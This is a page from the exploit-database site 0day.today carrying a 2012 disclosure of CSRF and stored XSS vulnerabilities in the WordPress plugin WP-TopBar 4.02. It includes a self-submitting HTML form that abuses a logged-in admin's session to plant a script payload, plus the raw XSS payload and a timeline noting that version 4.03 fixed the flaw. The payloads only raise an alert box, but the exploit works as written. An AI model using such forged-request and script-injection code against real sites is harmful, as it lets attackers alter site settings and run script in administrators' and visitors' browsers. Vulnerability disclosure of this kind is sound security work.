0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Wordpress Wp-TopBar 4.02 CSRF/XSS Vulnerabilities
[# Exploit Title: WP-TopBar 4.02 CSRF
# Date: 2012-09-13
# Author: Blake Entrekin
# Version: 4.02
# Download Link: http://downloads.wordpress.org/plugin/wp-topbar.4.02.zip
# Vendor Link: http://wordpress.org/extend/plugins/wp-topbar/
-------------------
CSRF
-------------------
The wp-topbar.php does not utilize a nonce value when submitting any POST
changes. As a result, this page is vulnerable to Cross Site Request
Forgery.
Proof of Concept Code:
<html>
<head>
<title></title>
</head>
<body>
<form name="testform" action="
https://localhost/wordpress/wp-admin/admin.php?page=wp-topbar.php&action=topbartext&barid=1"
method="POST">
<br>
<input type="hidden" name="wptbbartext"
value="</script><script>onload=alert(3)</script>">
<input type="hidden" name="wptblinktext" value="whatever">
<input type="hidden" name="wptblinkurl"
value="http%3A%2F%2Fwordpress.org%2Fextend%2Fplugins%2Fwp-topbar%2F">
<input type="hidden" name="wptblinktarget" value="blank">
<input type="hidden" name="wptbenableimage" value="false">
<input type="hidden" name="wptbbarimage" value="">
<input type="hidden" name="update_wptbSettings"
value="Update+Settings">
</form>
<script type="text/javascript">
document.testform.submit();
</script>
</body>
</html>
This script takes advantage of a logged in user to submit the required
variables needed to update an existing TopBar with the required settings
that commits and executes a Stored XSS vulnerability from a previous
disclosure. In this example it was tested against a wordpress application
running on �localhost� and altered a TopBar with the �id� of 1. This
version of WP-TopBar creates a default TopBar with the id of 1 upon
installation. Any subsequent TopBar created has an id incremented. It can
be assumed that a user is more then likely to still have the default TopBar
and easily attack it.
# Vulnerability Timeline
2012-09-04 � Vulnerability Reported
2012-09-05 � Developer Acknowledges
2012-09-10 � Developer Issues Fix (v4.03)
2012-09-15 - Vulnerability Disclosed
--
Blake Entrekin
Independent Security Consultant/
Web Penetration Tester
http://EntreSec.blogspot.com
Twitter: @entresec <https://twitter.com/#%21/entresec>
# Exploit Title: WP-TopBar 4.02 Authenticated Stored XSS
# Date: 2012-09-13
# Author: Blake Entrekin
# Version: 4.02
# Download Link: http://downloads.wordpress.org/plugin/wp-topbar.4.02.zip
# Vendor Link: http://wordpress.org/extend/plugins/wp-topbar/
-------------------
Stored XSS
-------------------
The message field (wptbbartext variable) of the wp-topbar.php page is
vulnerable to Stored Cross-site Scripting. This variable is only
accessible via the admin menu of the plugin.
The following code is an example:
</script><script>alert(3)</script>
This code is committed to the database upon submission and will run both
under the admin interface when the bar is shown as a preview as well as the
front facing page where the bar is set to display.
# 0day.today [2024-12-29] #